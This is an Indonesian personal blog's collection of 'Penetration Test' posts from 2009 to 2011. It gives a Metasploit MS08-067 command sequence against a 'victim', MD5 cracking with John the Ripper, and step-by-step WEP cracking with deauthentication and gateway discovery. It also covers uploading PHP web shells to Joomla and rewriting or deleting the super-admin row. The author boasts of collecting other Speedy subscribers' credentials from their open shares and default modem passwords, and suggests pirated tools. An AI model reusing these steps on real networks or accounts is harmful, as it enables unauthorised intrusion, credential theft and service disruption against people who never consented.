Pencarian

Tampilkan postingan dengan label Penetration Test. Tampilkan semua postingan
Tampilkan postingan dengan label Penetration Test. Tampilkan semua postingan

Minggu, 03 April 2011

Exploit smb

Bug yang masih belum banyak disadari oleh end user sampai saat ini:
root@f0r-each:/home/a3m-nix# msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload windows/vncinject/bind_tcp
set rhost victim
exploit

http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi
http://www.securityfocus.com/archive/1/archive/1/479078/100/0/threaded

Minggu, 31 Januari 2010

Recovery Password Yahoo yang cukup berbahaya

Ketika membuat email baik di yahoomail atau gmail, kita selalu di minta untuk mengisi pertanyaan rahasia (Secret Question).

Apakah pertanyaan rahasia ini ?
Pertanyaan rahasia ini berguna untuk mereset (mengatur ulang) password account email kita jika suatu saat kita lupa password tersebut.

Saya pernah mencoba pada salah satu account di yahoo, me-reset password email melalui Pertanyaan Rahasia (Secret Question) dan Berhasil *banyak sekali pengguna menggunakan Secret Question yang gampang ditebak.

dan ketika masuk ke account tersebut lalu saya mencoba mengganti Secret Question dengan pertanyaan dan jawaban yang lain dan mencoba me-reset kembali account tersebut.

Sebelumnya untuk diketahui, ada 3 step yang harus dilalui untuk me-reset kembali account email di yahoo.
1. Memasukkan Email dan kode anti spam
2. Pilihan untuk mereset, bisa melalui secondary email atau pertanyaan rahasia.
3. Jawaban untuk pertanyaan rahasia (terdapat 2 pertanyaan yang harus sesuai jawabannya) *jika pada step 2 tidak memili secondary email.

Yang ANEHNYA jika kita salah memasukkan jawaban maka muncul pilihan (Ini bukan pertanyaan saya)


dan ketika saya klik pilihan (Ini bukan pertanyaan saya) tersebut maka pertanyaan rahasia yang lama kembali muncul. dan saya masih bisa me-reset password account tersebut melalui pertanyaan rahasia yang lama tadi dan jawaban yang lama juga. lalu apa gunanya saya mengganti Pertanyaan Rahasia sebelumnya ?????

Saya pun tidak mengetahui jawabannya :D, karena menurut saya ada banyak sekali kemungkinannya.

Mengapa yahoo masih tetap menyimpan pertanyaan rahasia saya yang lama (pertanyaan yang dibuat sewaktu membuat email yahoo pertama kali) padahal saya sudah menganti pertanyaan serta jawaban itu (pada login sebelumnya),

Apakah memang seperti ini keamanan yang diterapkan oleh yahoo, ataukah ada pengaturan yang salah pada account saya (karena bukan pengguna yahoo aktif, saya pengguna gmail) :D
atau mungkin browser saya yang bermasalah (walaupun saya mencoba di browser lain juga) ??

ataukah pada proses "Update Data Set Ulang sandi" ternyata pertanyaan rahasia lama (yang pertama kali pada waktu buat account) tetap ada, jadi proses nya bukan update melainkan insert data baru dan pertanyaan yang lama tetap dijadikan Primay Secret Question (berantakan bahasa gw :)) :)) )
ataukan bug ? ataukah ini, itu... who knows ? Yang jelas hal tersebut sangat berbahaya menurut saya.

Dengan marak nya Hacking account Facebook menggunakan cara reset password, hal diatas tentu sangat berbahaya. Ketika seseorang bisa menebak Pertanyaan Rahasia kamu maka selamanya dia bisa mengakses account yahoo kamu walaupun kamu sudah mengganti pertanyaan rahasia tersebut, karena pada kenyataannya pertanyaan rahasia yang pertama tidak pernah diganti.

Yang makin parah, begitu banyak para Facebookers yang lupa password email nya sendiri (cuma ingat password Facebook aja).
Ketika seseorang sudah bisa mendapatkan account email yang kita gunakan untuk mendaftar di Facebook maka orang itu juga bisa dengan mudah mereset password Facebook kita yang juga butuh konfirmasi dari email.

Lalu masih amankah menggunakan email di yahoo...???
Waowww, tentu saja IYAAA, karena yahoo itu perusahaan besar :D.

Saya bukan pakar keamanan tapi menurut saya sendiri, keamanan itu juga tergantung dari end user (kita sebagai pengguna), karena pada saat membuat account baik di yahoo atau google, kita selalu di ingatkan kira2 seperti ini:
Untuk membuat password:
Catatan: Untuk melindungi account Anda dengan lebih baik, pastikan kata sandi mudah Anda ingat namun sulit untuk ditebak orang lain. Jangan memberitahukan kata sandi kepada siapa pun, dan jangan sekali-kali menggunakan lagi kata sandi yang pernah digunakan sebelumnya. Demi keamanan, panjang kata sandi baru harus minimal enam karakter. Kata sandi yang kuat adalah yang berisi kombinasi huruf besar dan huruf kecil (ingatlah bahwa kata sandi Anda membedakan huruf besar/kecil), angka, dan karakter khusus seperti +, ?, dan *.

dan untuk "Pertanyaan Rahasia"
Pastikan jawaban Anda adalah mudah diingat untuk Anda, tetapi sulit bagi orang lain untuk menebak!


dan jika ternyata pada suatu saat Account kita di hack karena menggunakan weak password (password yang lemah) seperti tanggal, bulan, tahun lahir lalu juga menggunakan Pertanyaan Rahasia yang mudah ditebak maka tidak ada pihak lain yang bisa disalahkan selain diri sendiri =)).

Lalu bagaimana cara mengamankan email dan Facebook saya dari para Attacker (Cracker) ????
Saya kira sudah terlalu banyak tulisan yang bisa kamu cari melalui http://www.google.co.id :D

*Tulisan ini saya buat setelah saya mencoba sendiri pada account xxx@yahoo.co.id dan setelah beberapa kali mengganti Pertanyaan Rahasia ternyata tetap sia-sia karena menggunakan Pertanyaan Rahasia yang lama saya tetap bisa me-reset account tersebut.
dan Tulisan ini juga tidak bermaksud untuk menjatuhkan pihak-pihak tertentu, Just Share.... :D

Sabtu, 24 Oktober 2009

Crack MD5 dengan John the Ripper

MD5 (Message Digest algorithm 5) adalah suatu algoritma ONE WAY HASH yang artinya ini adalah enkripsi searah yang tidak ada decrypt nya kecuali dengan menggunakan metode brute force attack (metode coba-coba).
Beberapa website lokal maupun luar masih banyak menggunakan md5 untuk enkripsi password login user.

Salah satu tools yg bisa digunakan adalah John The Ripper . JTR bisa digunakan baik di lingkungan windows atau di linux.

Perintah yg pernah saya coba untuk proses crack md5 adalah:
buat satu file txt, lalu simpan dengan nama crackthis.txt
file crackthis.txt berisi hasil enkripsi dari md5, formatnya yg saya gunakan seperti ini:
md5:e10adc3949ba59abbe56e057f20f883e

setelah itu jalankan perintahnya:
root@logic-server:/pentest/passwords/jtr# ./john --format=raw-MD5 /home/a3m-nix/crackthis.txt

tidak membutuhkan waktu yang lama, maka JTR akan menampilkan hasilnya:
Loaded 1 password hash (Raw MD5 [raw-md5])
123456 (md5)

Yang artinya nilai awal dari e10adc3949ba59abbe56e057f20f883e adalah 123456
Yah, proses cracking diatas tidak memakan waktu yang lama, malah hanya dalam hitungan detik, hal ini disebabkan kombinasi password yang sangat lemah (walaupun ternyata masih banyak ditemui).

Proses brute force ini memakan banyak sekali memori, dan tentu saja membuat pc kamu menjadi sangat lemot alias lambat :D.
Jika kita menggunakan kombinasi password yg lebih komplek misalnya seperti 109rIN1x, maka JTR akan sangat kesulitan untuk memBrute force nya, malah kemungkinan berhasilnya sangat kecil.
Selain md5, masih banyak yang bisa dilakukan dengan JTR, antara lain
--format=NAME force hash type NAME: DES/BSDI/MD5/BF/AFS/LM/NT/XSHA/PO/raw-MD5/IPB2/raw-sha1/md5a/hmac-md5/KRB5/bfegg/nsldap/ssha/openssha/oracle/MYSQL/mysql-sha1/mscash/lotus5/DOMINOSEC/NETLM/NETNTLM/NETLMv2/NETHALFLM/mssql/mssql05/epi/phps/mysql-fast/pix-md5/sapG/sapB/md5ns/HDAA

Selamat mencoba :D

Kamis, 15 Oktober 2009

Cracking WEP menggunakan Linux

Yapz, Cracking WEP tidaklah sesulit yang dibayangkan, dengan bantuan software seperti kismet, aircrack, commview for wifi (for windows) dlsb maka dengan mudah kita akan mendapatkan WEP dan masuk dari satu jaringan ke jaringan komputer yang lain.
Tentunya untuk melakukan proses cracking pada jaringan wireless, chipset wireless kita harus mendukung mode monitoring dan injeksi paket.

Mode Monitoring disini maksudnya, chipset wireless kita mampu melakukan sniffing dengan metode Passive Scanning menggunakan software seperti airodump, kismet dlsb.

Passive scanning dapat diartikan yaitu, dimana wireless adapter dengan menggunakan software seperti kismet hanya diam, mengamati, dan menyimpan semua paket/informasi yang ditemukannya pada setiap jaringan wireless.

Sebelumnya harus diketahui lebih dahulu beberapa pengertian yang sering digunakan di jaringan wireless.

SSID : adalah nama dari jaringan wireless, misalnya workgroup pada jaringan kabel.
BSSID: ini adalah alamat Mac dari Acces Point.
AP/Radio : Acces Point
WEP : adalah salah satu metode Keamanan pada jaringan wireless.
Kismet, airodump-ng : Software passive scanning yang berjalan di OS linux *(di win jg ada).

Beberapa tahapan/perintah yang sering digunakan dalam proses cracking WEP di linux.

Membuat virtual adapter yang akan digunakan untuk proses cracking.
a3m-nix@logic-server:~$ sudo airmon-ng start wlan0
Interface Chipset Driver

wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)

maka akan tercipta satu adapter dengan nama mon0

Menjalankan kismet dan airodump-ng untuk melihat SSID yang bertebaran disekitar.
a3m-nix@logic-server:~$ sudo kismet

Untuk melihat informasi bssid, channel dan enkripsi, tekan i pada keyboard
untuk melihat klien yang terkoneksi ke AP, tekan c pada keyboar
untuk back, tekan x.

lalu simpan Channel, SSID dan BSSID beserta semua informasi AP dan client dari target.
lanjutkan dengan mengumpulkan paket data dari target:
a3m-nix@logic-server:~$ sudo airodump-ng mon0 -w hasil --bssid 05:02:D2:5U:B8:CA


--bssid : artinya scanning yang dilakukan airodump hanya pada AP tertentu *bssid ini alamat mac dari Acces Point, jika tidak diberi opsi --bssid maka airodump akan melakukan scanning pada semua jaringan yang ditemui.

airodump-ng akan membagi hasil scanning paket yang dilakukan dalam beberapa file, jika kita beri nama "hasil" seperti diatas maka akan menjadi hasil-01.cap,hasil-02.cap dst

setelah paket data terkumpul (saya mencoba dengan 30000 paket data) lakukan proses cracking dengan aircrack.

a3m-nix@logic-server:~$ sudo aircrack-ng hasil*.cap

hasil*.cap artinya aircrack akan mengambil semua file dengan ekstensi .cap yang diawali dengan nama "hasil".
Jika belum menemukan WEP nya, teruskan mengumpulkan paket data.
Saya juga pernah melakukan proses cracking dengan 12000 paket dan berhasil menemukan WEP.
Hal ini terjadi karena tidak semua paket yang ditangkap airodump menyertakan IVs yg diperlukan aircrack utk proses cracking.
Jadi semakin banyak jumlah paket, kemungkinan mendapatkan WEP semakin besar.

Jika kamu kesulitan untuk melihat SSID target, maka bisa mencoba dengan cara memutuskan hubungan AP dengan Client menggunakan aireplay --deauth

a3m-nix@logic-server:~$ sudo aireplay-ng --deauth 50 -a 05:02:D2:5U:B8:CA -c 00:17:9A:39:2C:02 mon0

--deauth 50: pemutusan koneksi akan terus dicoba oleh aireplay selama 50x.
-a : adalah bssid/mac dari AP target
-c : adalah client yang ingin kita putuskan koneksi nya.
mon0: injeksi menggunakan adapter virtual yang baru diciptakan tadi
untuk menggunakan cara ini, tentunya chipset wireless kita harus mendukung injeksi paket. :D

Setelah mendapatkan WEP, di mulailah dengan tahap pencarian IP yang sangat menyenangkan.
Untuk mengetahui alamat IP bisa menggunakan netcut, commview on windows atau wireshark dan software sniffing lainnya di linux.

Dikarenakan chipset saya tidak didukung oleh commview for wifi di window, maka saya menggunakan wireshark dan nmap di linux.

Pertama berikan dulu alamat IP dengan sembarang, lalu buka wireshark dan perhatikan setiap paket data dan alamat IP nya.
lalu set alamat IP kita satu class dengan alamat IP yang terlihat melalui wireshark.
gunakan nmap untuk melakukan scanning.

Untuk mengetahui Gateway dan DNS, juga gunakan nmap.
Cara nya dengan melihat port-port serta OS dari host hasil scanning.
Jika hasil scanning nmap mengatakan OS dari IP yg kita scanning adalah Linux/mikrotik, maka coba menggunakan IP tersebut. jika tidak berhasil, try again dan again dengan IP lain.
biasanya admin menggunakan 254 atau 1 untuk gateway, dan jika ternyata admin nya menggunakan arp list pada mikrotik, tinggal ubah mac address kita dan ip yang sesuai dengan mac klien nya tsb hingga

a3m-nix@logic-server:~$ ping www.google.co.id
PING www.l.google.com (216.239.61.104) 56(84) bytes of data.
64 bytes from sin01s01-in-f104.google.com (216.239.61.104): icmp_seq=1 ttl=243 time=40.6 ms
64 bytes from sin01s01-in-f104.google.com (216.239.61.104): icmp_seq=2 ttl=243 time=39.2 ms
64 bytes from sin01s01-in-f104.google.com (216.239.61.104): icmp_seq=4 ttl=243 time=61.3 ms
--- www.l.google.com ping statistics ---
4 packets transmitted, 3 received, 25% packet loss, time 3010ms rtt min/avg/max/mdev = 39.206/47.097/61.394/10.130 ms

lol

Jika menggunakan windows, kita bisa memanfaatkan software seperti commview for wifi dan sayangnya software ini berbayar dan tentu kamu tau bagaimana mendapatkan versi full nya dengan gratis hee...

Tahapan cracking WEP menggunakan commview for wifi di windows sama saja, kumpulkan paket data menggunakan commview for wifi lalu simpan dan crack dengan aircrack for windows.
setelah mendapatkan WEP, lalu masukkan WEP key tersebut di commview for wifi dan akan terlihat semua lalu lintas jaringan beserta alamat IP nya.

Kalo sudah dapat WEP, IP, Gateway, DNS nya, aman dah. terserah kamu mau bagaimana lagi selanjutnya :D

*Pada percobaan ini, saya menggunakan USB Wireless TP-LINK TL WN321G dengan chipset ralink rt73 yang sudah di support oleh linux ubuntu yang saya pakai.
Chipset rt73 ini juga sudah di support oleh Bactrack 3.0, dan malah menghasilkan signal yg sangat bagus dengan backtrack 3.0 yang masih menggunakan basis slackware.

*Saya juga pernah mencoba menggunakan chipset atheros ar500x dan ternyata di support oleh commview for wifi di windows.
* commview terdapat 2 versi, pertama for wifi yg dilengkapi fitur utk sniffing jaringan wireless, lalu commview yg hanya bisa sniffing jaringan kabel

Semoga bermanfaat....
beberapa pengertian dan cara diatas adalah menurut saya yang masih sangat baru belajar dunia nirkabel ini, jadi harap maklum :D
Thanks to om st'o, Wireless Kung Fu Networking & Hacking memang Top banget dah
biggrin

Jumat, 10 April 2009

DDoS Distributed Denial of Service

Katanya sih Serangan yang belum ada obatnya sampai sekarang, Distributed Denial of Service adalah Suatu Upaya untuk menghabiskan daya/resource Komputer Server sehingga komputer tersebut down dan tamat riwayatnya.

Serangan ini menggunakan zombie (komputer-komputer lain yang sudah dikendalikan oleh si penyerang), dengan cara mengirim paket data sebanyak mungkin dari sebanyak-banyaknya zombie yang ada, lalu Si Server yang di serang akan kesulitan menerima kiriman paket data tersebut sampai akhirnya terjatuh tanpa perlawanan.

Untuk yang mau coba di Jaringan LAN, bisa download tools untuk melakukan serangan DDoS tapi hati-hati penggunaannya, dan tentunya saya tidak bertanggung jawab atas apa yang akan terjadi, download.

dan untuk menyerang website tertentu dengan DDoS, diperlukan komputer zombie, semakin banyak zombie nya semakin mantaff pula serangannya.
Sowry saya belum bisa posting, tunggu aja selanjutnya...

Kamis, 19 Maret 2009

Administrator to Super Administrator pada Joomla

Administrator to Super Administrator pada Joomla

Bingung kan dengan judul artikel di atas...!!! hee...he...
Maksudnya jika anda seorang Super Administrator pada website yang dibangun dengan joomla dan tidak memperhatikan dengan baik hak akses seorang administrator maka jangan terkejeut bila suatu saat anda tidak bisa login atau account anda di hapus di website tersebut oleh si administrator. koq bisa, padahal administrator kan dibawah saya ?
untuk lebih jelas kita akan sedikit membahas tentang tingkatan user pada joomla, Privileged.

1. Super Administrator : ini adalah tingkatan tertinggi pada joomla dimana dengan menjadi Super Administrator kita bisa mengatur user lain seperti Administrator, Manager dan user-user lainnya.

2. Administrator: yang membawahi manager, auditor, publisher dsb.

tentun saja tingkatan user pada joomla tidak selamanya seperti diatas (tapi setau saya memang seperti itu), karena kita bisa mengaturnya sendiri sesuai kemauan kita.

Koq Administrator mau menjadi Super Administrator ?
tentu saja, karena menurut saya tidak ada orang yang mau dibatasi hak aksesnya/ Privileged, karena Limited ini membosaaaannnkan.

Misalnya: anda membuat website menggunakan joomla untuk Perusahaan tertentu, lalu untuk maksud dan tujuan tertentu (entah baik atau buruk), anda hanya memberikan kepada klien anda tadi username dan password sebagai Administrator bukan Super Administrator,
dengan alasan ada beberapa menu yang nggak boleh di akses oleh si Klien tersebut.
anda membatasi bahwa Menu Setting Server (Global Configuration) nggak bisa di akses oleh si klien dengan tujuan ketika anda lagi bokek alias buntu alias nggak ada duit dan untuk beli rokok aja susah banget, anda mengubah setting Global Configuration misalnya pada SEO Setting,
jadi website tersebut tidak akan bisa di akses selama file .htaccess nya tidak di ubah atau
mengembalikan SEO Settings nya kembali seperti semula, lalu anda berharap klien anda tadi akan menghubungi anda atas permasalahan pada website tersebut, dan dapet duit dah untuk jajan, dan lagi, untuk memuluskan tujuan tersebut anda juga tidak memberikan username dan password tempat hosting website tersebut pada waktu proses serah terima websitenya.

Contoh seperti diatas mungkin saja terjadi (udah sering malah) tapi ini tidak akan terjadi jika Administrator di klien anda tersebut nggak gaol.
Bagaimana jika si Administrator website tersebut bukan manusia biasa (hantu, sunder bolong dlsb), eh maksud saya administrator nya mengerti sedikit tentang dunia underground..???

dan di Karenakan pada waktu proses pembuatan web tersebut mau cepet dan lumayan asal-asalan maka anda tidak mengatur tentang hak akses si Administrator.

lalu dengan sedikit pemahaman tentang hacking dan blaa..blaa... si administrator mulai mencari-cari cara untuk memasukkan Shell Script PHP ke dalam website tersebut.
dan terpikirlah si Administrator tadi, untuk meng Install Component yang bisa mengizinkan Administrator untuk mengUpload file tertentu ke web tersebut.

Selanjutnya si administrator segera meluncur ke http://extensions.joomla.org/extensions,
setelah mencari dengan penuh keseriusan akhirnya ketemu juga Component seperti Jdoc atau Simple Uploader dll.

lalu tinggal mengInstall Component tersebut dan mengUpload Script Shell seperti r57, c99, c100 dan Shell sejenis lainnya yang keren-keren abiz.

Setelah shell tersebut masuk, si Administrator tinggal mengAkses shell tersebut layaknya Backdoor, dan Jreenggg...jrenggg... si administrator tadi udah nyampe di root website nya.

Apa yang bisa dilakukan si administrator melalui Shell Script yang di uploadnya tadi ?
Buannyaaaakkk banget...
antara lain:

1. Membuka file configuration.php, lalu di file tersebut bisa dilihat username, password serta nama database yang digunakan.
2. Setelah mendapatkan user,password dan nama database, biasa nya di Shell Script terdapat fasilitas untuk menjalankan Query Sql.
3. lalu mengubah status Administrator menjadi Super Administrator atau mengubah password anda dengan perintah misalnya seperti ini: update jos_users set password='password baru' where id='62'.

Untuk mendapatkan password baru, si Administrator tinggal membuat user baru di joomla localnya dan liat hasil Encrypt di database, copy dan paste pada Query tadi.
atau bisa juga si administrator dengan penuh kreatifitas mencari tools yang berserakan di internet untuk decrypt password joomla pada account anda.

dan yang lebih parah nya, dengan penuh rasa kesal bercampur sedikit kebanggaan di hapus nya account Super Administrator anda dari database tersebut misalnya dengan perintah delete from jos_users where id='62'
dan yang terakhir di backupnya semua tabel di database tersebut untuk jaga-jaga.

Mungkin anda berpikir, "saya kan bisa masuk melalui Cpanel/Spanel lalu saya ubah lagi account tersebut. "
tapi bagaimana jika si Administrator tadi melapor pada atasannya misalnya pada Kepala Bagian IT nya seperti ini.

" Pak, akhirnya saya tau mengapa selama berberapa hari ini website kita tidak bisa di akses,
hal ini dikarenakan ada yang mengubah setting ini dan itu pada halaman Back End web kita.
dan menurut saya lagi, selain di hack, yang bisa mengubah setting tersebut hanya orang yang punya hak akses "Super Administrator", dan ternyata account/hak akses yang kita miliki pada website ini hanya Administrator.
jadi menurut saya, kita putuskan saja hubungan kita dengan si bedol pembuat website ini, dengan alasan, tidak profesional karena pada kontrak kita seharusnya kita mendapatkan fasilitas yang full dan dia tidak memberikan kita akses Super Administrator dan username/password pada web hosting, padahal seharusnya itu sudah menjadi hak kita sebagai klien.
saya sudah memback up data dari website kita, dan sebaiknya kita pindah tempat hosting saja pak, dan mencari Web Development yang lebih professional."

dengan sedikit bingung akhirnya si kepala IT tadi mempertimbangkan usulan tersebut, dan dalam berberapa hari usulan tersebut disetujui.

lalu apa yang anda dapatkan sang Super Administrator:
1. Anda akan terus menunggu dan menunggu klien tadi menghubugi anda, menanti sebuah pertanyaan hee...
2. Nama anda sebagai Web Development udah nggak bagus.
dan masih buanyaaak lagi keuntungan eh kerugian yang anda dapatkan dari yang anda lakukan pada website tersebut....

Mending selurusan aja dahh....
PHP Shell atau Script Shell adalah sebuah Script yang dibuat dengan bahasa PHP, dimana di Shell ini terdapat Fasilitas untuk memasukkan perintah-perintah unix/linux, selain itu terdapat juga fasilitas untuk perintah Query, edit file dll...

SQL Ijnection dengan Schemafuzz

Ringkasan ini tidak tersedia. Harap klik di sini untuk melihat postingan.

Selasa, 17 Maret 2009

Tentang PHP Shell Injection dan Hacked got Hacked

Buat yang hobi ngeRoot Website menggunakan PHP Shell Injection saya saranin untuk berhati-hati jika menggunakan shell baik Shell produksi lokal ato dari luar masalahnya bisa Hacked got Hacked.

Setelah saya buka koding shell sejenis c99 atau r57 dlsb ternyata ada beberapa perintah dalam shell script yang intinya mengirim email kepada si pembuat atau yang modifikasi Shell tersebut.
Email yang dikirim berupa alamat shell *Path shell serta password +session.
kalo nggak percaya, ini screenshoot nya:
shell
Email tersebut akan terus terkirim setiap kali kamu mengakses shell.

Jadi jangan heran ketika suatu waktu kamu akses lagi shell simpanan kamu ternyata sudah nggak bisa
Alamat Email dalam shell biasanya di Encode menggunakan base64 jadi agak susah nyarinya.
saya udah buat satu Script buat encode dan decode base64 waktu saya melihat-lihat isi shell.

Cara saya bersihin shell seperti ini ( mudah-mudahan shell nya sudah bersih..)
1. Buka Shell Script dengan notepad++ atau editor lain.
2. Cari perintah header karena perintah ini biasa dipakai untuk mengirim email, lihat apa saja variabel yang dikirim menggunakan header dan telusuri variabel tersebut.
3. atau bisa juga langsung cari "base64_decode" tanpa kutip.
4. Setelah itu coba kamu decode menggunakan base64_decode lalu ganti alamat email atau alamat apapun hasil decode tadi.

Saya punya contoh shell yang udah di edit2 :D :D :D.
Silahkan donlod disini.
http://www.ziddu.com/download/4693787/MyNix.rar.html
ada juga Script sederhana untuk base64_encode/decode
http://www.ziddu.com/download/4693812/base.rar.html
Semoga bermanfaat :D..

Minggu, 22 Februari 2009

Scanning Kelemahan Website

Acunetix Web Vulnerability Scanner
Ada satu software yang saya temui yang keren banget Acunetix Web Vulnerability Scanner, karena dengan software ini kita bisa menganalisa kelemahan-kelemahan pada website yang telah kita bangun dengan cara mudah sekali, tinggal masukkan alamat dan klik, lalu software tersebut akan mencari Vulnerability (kelemahan) yang terdapat pada website yang kamu buat, scanning vulner yang mampu dilakukan oleh software ini meliputi XSS Injection, SQL Injection, PHP Injection, Broken Link, Email Spam, Vulner pada WebServerdll, dan juga software ini bisa menunjukkan Struktur folder yang terdapat pada website kita.
Screen Shotnya ne,


Karena Software ini bagus jadi nggak gratiss heee...(mahaaaaaaaaall).
Kamu bisa mencoba versi trial nya di Acunetix Web Vulnerability Scanner
atau kamu bisa mengKreatifkan diri kamu dengan mencari bajakannya di pelosok-pelosok internet ini.
Try it.....

Senin, 09 Februari 2009

Hacking Modem Speedy

Judulnya keren banget kan ??? Padahal isinya nggak segitu-gitu amat koq hee....
Speedy, Akses internet dari telkom yang menggunakan line telpon sebagai jalur aksesnya dan model ADSL sebagai konversi sinyalnya dari analog ke digital dan sebaliknya nya....

Baru denger2 kabar jg ne , katanya sekarang make speedy mesti hati-hati apalagi make yang nggak paket Unlimited karena udah banyak korban yang berguguran. Make internet cuma beberapa jam eh taunya ketika bayar sampe berjuta-juta..

Kabarnya sih sekarang ada sebuah teknik yang sedang berkembang yaitu teknik Broadcast untuk hacking modem speedy (kurang ngerti juga tuh). tapi dengan teknik itu, kita bisa memakai login orang lain walaupun beda line telpon, mungkin dengan menggunakan atau mengubah MAC Address atau bla...bla....

Setau saya juga, Pihak Telkom sendiri telah mendisable akses internet dengan jaringan telpon yang resmi. Maksudnya, walau si Penjahat dapat no speedy dan password kamu, Dia tetap tidak bisa memakai account kamu untuk koneksi ke internet atau kalo bahasa saya, line telpon dan username tersebut udah di jumper sendiri-sendiri jadi setiap line telpon cuma bisa login dengan username dan password yang udah ditentukan oleh pihak telkom.


kalo yang saya tau lagi, ada beberapa (bahkan banyak sekali) Client Speedy yang tidak menyadari bahwa dengan memakai koneksi internet speedy, dia juga telah terkoneksi langsung dengan sebuah jaringan besar milik telkom. Contoh kecilnya adalah ketika saya menggunakan software Netscan atau Advanced Port Scanner untuk mencari host speedy yang sedang hidup, lalu saya menemukan banyak sekali host yang hidup beserta folder-folder yang di sharing host tersebut dan yang lebih celaka lagi, folder atau Drive yang saya temui bukan hanya di Sharing tapi juga di Allow Network User to Change File. Orang lain ngambil data kita aja udah bahaya tuh, apalagi sampe bisa nyimpan file di drive kita, bisa tambah gawat.

Menurut saya, sharing folder bisa terbaca di jaringan telkom speedy karena banyak client speedy yang menggunakan dial up via pc, jadi bukan modem yang terkoneksi tapi PC nya langsung yang mendapat IP DHCP dari jaringan telkom speedy.

Beberapa hari yang lalu saya sering banget menjelajah dari satu host ke host yang lain di jaringan telkom speedy dan hasilnya banyak dah username sama password yang saya dapet (nyimpennya di file text sih), tinggal make nya aja neh hee...

Selain itu, dengan tau IP client speedy yang lain, kita juga bisa mengakses modemnya via telnet ato browser (dial Up dari modem tuh) dan bagusnya lagi, buaaaanyak banget client speedy yang menggunakan password default untuk modemnya, kalo udah bisa masuk ke modem nya, ya terserah kita dah, mau di acak-acak configure nya atau mau mencuri user dan password dialnya, pokoknya seru.

jadi, saran saya lebih baik dial dari modem aja lah, tapi password defaultnya mesti diganti (password sendiri aja saya nggak percaya apalagi password default yang udah di ketahui hampir diseluruh belahan internet ini).

tinggal nunggu waktu aja ne kapan bisa make login orang laen ato malah login sy yang dipake orang lain heee....